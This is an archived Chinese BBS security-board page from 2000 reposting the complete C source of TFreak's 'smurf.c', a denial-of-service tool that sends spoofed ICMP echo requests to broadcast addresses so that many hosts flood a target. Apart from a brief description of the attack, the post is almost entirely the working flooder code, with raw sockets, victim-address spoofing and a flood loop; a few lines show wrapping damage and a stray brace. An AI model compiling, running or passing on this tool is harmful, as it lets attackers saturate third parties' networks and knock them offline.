336.htm

unix高级编程原吗

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<title>CTerm非常精华下载</title>
</head>
<body bgcolor="#FFFFFF">
<table border="0" width="100%" cellspacing="0" cellpadding="0" height="577">
<tr><td width="32%" rowspan="3" height="123"><img src="DDl_back.jpg" width="300" height="129" alt="DDl_back.jpg"></td><td width="30%" background="DDl_back2.jpg" height="35"><p align="center"><a href="http://apue.dhs.org"><font face="黑体"><big><big>apue</big></big></font></a></td></tr>
<tr>
<td width="68%" background="DDl_back2.jpg" height="44"><big><big><font face="黑体"><p align="center">               ● UNIX网络编程                       (BM: clown)                </font></big></big></td></tr>
<tr>
<td width="68%" height="44" bgcolor="#000000"><font face="黑体"><big><big><p   align="center"></big></big><a href="http://cterm.163.net"><img src="banner.gif" width="400" height="60" alt="banner.gif"border="0"></a></font></td>
</tr>
<tr><td width="100%" colspan="2" height="100" align="center" valign="top"><br><p align="center">[<a href="index.htm">回到开始</a>][<a href="184.htm">上一层</a>][<a href="337.htm">下一篇</a>]
<hr><p align="left"><small>发信人: scz (小四), 信区: Security <br>
标  题: [13.0.4] TCP/IP Flooding with Smurf <br>
发信站: 武汉白云黄鹤站 (Tue Oct 10 22:05:24 2000), 站内信件 <br>
Found by TFreak (from ntsecurity.net) <br>
The Problem <br>
The smurf attack is quite simple. It has a list of broadcast addresses which <br>
 it <br>
stores into <br>
an array, and sends a spoofed ICMP echo request to each of those addresses i <br>
n se <br>
ries and <br>
starts again. The result is a devistating attack upon the spoofed IP. Depend <br>
ing <br>
on the <br>
amount of broadcast addresses used, many, many computers may respond to the <br>
echo <br>
request. <br>
This attack can EASILY saturate a T1 circuit, rendering it completely useles <br>
s. <br>
HERE IS THE SMURF SOURCE CODE: <br>
* $Id smurf.c,v 4.0 1997/10/11 13:02:42 EST tfreak Exp $* <br>
* spoofs icmp packets from a host to various broadcast addresses resulting <br>
* in multiple replies to that host from a single packet. <br>

* disclaimer: <br>
* I cannot and will not be held responsible nor legally bound for the <br>
* malicious activities of individuals who come into possession of this <br>
   * program and I refuse to provide help or support of any kind and do NOT <br>
* condone use of this program to deny service to anyone or any machine. <br>
* This is for educational use only. Please Don't abuse this. <br>
* TFreak <br>
*/ <br>
#include <signal.h> <br>
#include <stdio.h> <br>
#include <stdlib.h> <br>
#include <sys/socket.h> <br>
#include <sys/types.h> <br>
#include <netinet/in.h> <br>
#include <netinet/ip.h> <br>
#include <netinet/ip_icmp.h> <br>
#include <netdb.h> <br>
#include <ctype.h> <br>
#include <arpa/inet.h> <br>
#include <unistd.h> <br>
#include <string.h> <br>
void banner(void); <br>

void usage(char *); <br>
void smurf(int, struct sockaddr_in, u_long, int); <br>
void ctrlc(int); <br>
unsigned short in_chksum(u_short *, int); <br>
/* stamp */ <br>
char id[] = "$Id smurf.c,v 4.0 1997/10/11 13:02:42 EST tfreak Exp $"; <br>
int main (int argc, char *argv[]) <br>
{ <br>
struct sockaddr_in sin; <br>
struct hostent *he; <br>
FILE *bcastfile; <br>
int i, sock, bcast, delay, num, pktsize, cycle = 0, x; <br>
char buf[32], **bcastaddr = malloc(8192); <br>
banner(); <br>
signal(SIGINT, ctrlc); <br>
if (argc < 6) usage(argv[0]); <br>
if ((he = gethostbyname(argv[1])) == NULL) { <br>
perror("resolving source host"); <br>
exit(-1); <br>
} <br>
memcpy((caddr_t)&sin.sin_addr, he->h_addr, he->h_length); <br>
sin.sin_family = AF_INET; <br>

sin.sin_port = htons(0); <br>
num = atoi(argv[3]); <br>
delay = atoi(argv[4]); <br>
pktsize = atoi(argv[5]); <br>
if ((bcastfile = fopen(argv[2], "r")) == NULL) { <br>
perror("opening bcast file"); <br>
exit(-1); <br>
} <br>
x = 0; <br>
while (!feof(bcastfile)) { <br>
fgets(buf, 32, bcastfile); <br>
if (buf[0] == '#' || buf[0] == '\n' || ! isdigit(buf[0])) continue; <br>
for (i = 0; i < strlen(buf); i++) <br>
if (buf[i] == '\n') buf[i] = '\0'; <br>
bcastaddr[x] = malloc(32); <br>
strcpy(bcastaddr[x], buf); <br>
x++; <br>
} <br>
bcastaddr[x] = 0x0; <br>
fclose(bcastfile); <br>
if (x == 0) { <br>
fprintf(stderr, "ERROR: no broadcasts found in file %s\n\n", argv[2]); <br>

exit(-1); <br>
} <br>
if (pktsize > 1024) { <br>
fprintf(stderr, "ERROR: packet size must be < 1024\n\n"); <br>
exit(-1); <br>
} <br>
if ((sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) { <br>
perror("getting socket"); <br>
exit(-1); <br>
} <br>
setsockopt(sock, SOL_SOCKET, SO_BROADCAST, (char *)&bcast, sizeof(bcast)); <br>
printf("Flooding %s (. = 25 outgoing packets)\n", argv[1]); <br>
for (i = 0; i < num || !num; i++) { <br>
if (!(i % 25)) { printf("."); fflush(stdout); } <br>
smurf(sock, sin, inet_addr(bcastaddr[cycle]), pktsize); <br>
cycle++; <br>
if (bcastaddr[cycle] == 0x0) cycle = 0; <br>
usleep(delay); <br>
} <br>
puts("\n\n"); <br>
return 0; <br>
} <br>
} <br>
void banner (void) <br>
{ <br>
puts("\nsmurf.c v4.0 by TFreak\n"); <br>
} <br>
void usage (char *prog) <br>
{ <br>
fprintf(stderr, "usage: %s " <br>
" \n\n" <br>
"target = address to hit\n" <br>
"bcast file = file to read broadcast addresses from\n" <br>
"num packets = number of packets to send (0 = flood)\n" <br>
"packet delay = wait between each packet (in ms)\n" <br>
"packet size = size of packet (< 1024)\n\n", prog); <br>
exit(-1); <br>
} <br>
void smurf (int sock, struct sockaddr_in sin, u_long dest, int psize) <br>
{ <br>
struct iphdr *ip; <br>
struct icmphdr *icmp; <br>
char *packet; <br>
packet = malloc(sizeof(struct iphdr) + sizeof(struct icmphdr) + psize); <br>
ip = (struct iphdr *)packet; <br>

icmp = (struct icmphdr *) (packet + sizeof(struct iphdr)); <br>
memset(packet, 0, sizeof(struct iphdr) + sizeof(struct icmphdr) + psize); <br>
ip->tot_len = htons(sizeof(struct iphdr) + sizeof(struct icmphdr) + psize); <br>
ip->ihl = 5; <br>
ip->version = 4; <br>
ip->ttl = 255; <br>
ip->tos = 0; <br>
ip->frag_off = 0; <br>
ip->protocol = IPPROTO_ICMP; <br>
ip->saddr = sin.sin_addr.s_addr; <br>
ip->daddr = dest; <br>
ip->check = in_chksum((u_short *)ip, sizeof(struct iphdr)); <br>
icmp->type = 8; <br>
icmp->code = 0; <br>
icmp->checksum = in_chksum((u_short *)icmp, sizeof(struct icmphdr) + psize); <br>
sendto(sock, packet, sizeof(struct iphdr) + sizeof(struct icmphdr) + psize, <br>
0, (struct sockaddr *)&sin, sizeof(struct sockaddr)); <br>
free(packet); /* free willy! */ <br>
} <br>
void ctrlc (int ignored) <br>
{ <br>
puts("\nDone!\n"); <br>

exit(1); <br>
} <br>
unsigned short in_chksum (u_short *addr, int len) <br>
{ <br>
register int nleft = len; <br>
register int sum = 0; <br>
u_short answer = 0; <br>
while (nleft > 1) { <br>
sum += *addr++; <br>
nleft -= 2; <br>
} <br>
if (nleft == 1) { <br>
*(u_char *)(&answer) = *(u_char *)addr; <br>
sum += answer; <br>
} <br>
sum = (sum >> 16) + (sum + 0xffff); <br>
sum += (sum >> 16); <br>
answer = ~sum; <br>
return(answer); <br>
} <br>
-- <br>
</small><hr>
<p align="center">[<a href="index.htm">回到开始</a>][<a href="184.htm">上一层</a>][<a href="337.htm">下一篇</a>]
<p align="center"><a href="http://cterm.163.net">欢迎访问Cterm主页</a></p>
</table>
</body>
</html>